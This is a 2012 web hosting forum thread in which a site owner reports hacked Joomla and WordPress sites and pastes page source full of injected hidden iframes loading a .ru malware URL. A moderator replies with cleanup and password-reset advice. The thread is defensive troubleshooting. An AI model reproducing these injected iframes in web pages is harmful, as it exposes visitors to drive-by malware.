Web Hosting Forum | Lunarpages


*
Welcome, Guest. Please login or register.
Did you miss your activation email?



Login with username, password and session length
April 24, 2014, 04:24:35 PM

Pages: [1]   Go Down
  Print  
Author Topic: url redirection to ladygaga site from googlesearch  (Read 7587 times)
VinhDucanh
Newbie
*
Offline Offline

Posts: 2


« on: November 06, 2012, 01:33:13 AM »

 url redirection to ladygaga site from googlesearch

my sites have been hacked ?  at http:/www.lunarvault.com and all sub domains. This just started today.  All sites has a bunch of small squares at top above logo.

Goolge posts http://productforums.google.com/forum/#!topic/webmasters/3g39NhBncl0

how could this happen ?    security hole in Joomla and Wordpress ?

Firebug shows this

<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html class="wf-quaraweb1quaraweb2-n4-active wf-pillgothic600mg1pillgothic600mg2-n3-active wf-pillgothic600mg1pillgothic600mg2-i3-active wf-pillgothic600mg1pillgothic600mg2-n4-active wf-pillgothic600mg1pillgothic600mg2-i4-active wf-pillgothic600mg1pillgothic600mg2-n7-active wf-pillgothic600mg1pillgothic600mg2-i7-active wf-pillgothic600mg1pillgothic600mg2-n8-active wf-pillgothic600mg1pillgothic600mg2-i8-active wf-adriannaextended1adriannaextended2-n3-active wf-adriannaextended1adriannaextended2-i3-active wf-prentonultracondensed1prentonultracondensed2-n3-active wf-prentonultracondensed1prentonultracondensed2-n4-active wf-active" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" style="height: 100%;">
<head>
<body id="ctl00_body" data-twttr-rendered="true" style="position: relative; min-height: 100%; top: 0px;">
</html>
</iframe>
<script type="text/javascript" src="/media/system/js/core.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/media/system/js/mootools-more.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/plugins/system/rokbox/rokbox.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/plugins/system/rokbox/themes/dark/rokbox-config.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/templates/gantry/js/rokmediaqueries.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/templates/gantry/js/load-transition.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/modules/mod_roknavmenu/themes/fusion/js/fusion.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/media/system/js/validate.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript" src="/modules/mod_otlightboxlogin/assets/js/otscript.js">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">
<script type="text/javascript">
<script type="text/javascript">
<script src="/modules/mod_thick_rss/includes/smoothbox.js" type="text/javascript">
<iframe width="15" scrolling="auto" height="15" frameborder="no" align="middle" src="http://resettingsubtraction.ru/pittancebrass.cgi?8">


Logged
MrPhil
Senior Moderator
Berserker Poster
*****
Offline Offline

Posts: 5811



« Reply #1 on: November 06, 2012, 05:56:43 AM »

All those iframes look suspicious, especially as they go to a Russian site. Do you have a backup, or otherwise know what's supposed to be in the code? I'm sure you can take out all the "iframe" stuff. They're probably the cause of those little boxes.

Make sure you're at the latest version for all your software. On the chance that an access password has been stolen, first scan your PC (used to access your site) for spyware and viruses. Once it's clean, change every password -- FTP, host account access, applications, databases. And of course, clean out your files, getting rid of any file you can't account for, and investigating recently updated files for hacker-added material like those iframes. It would help if you have known good backups, or at least know what's supposed to be in a given file (such as, you wrote it yourself). Worst case, you could wipe everything clean and restore from the last backup from before the trouble started. If you need to use LP's backup, be aware that it costs ($75, I think) and they only keep a backup around for a few days, so don't delay.
Logged

Visit My Site

E-mail Me
  
-= From the ashes shall rise a sooty tern =-
Pages: [1]   Go Up
  Print  
 
Jump to: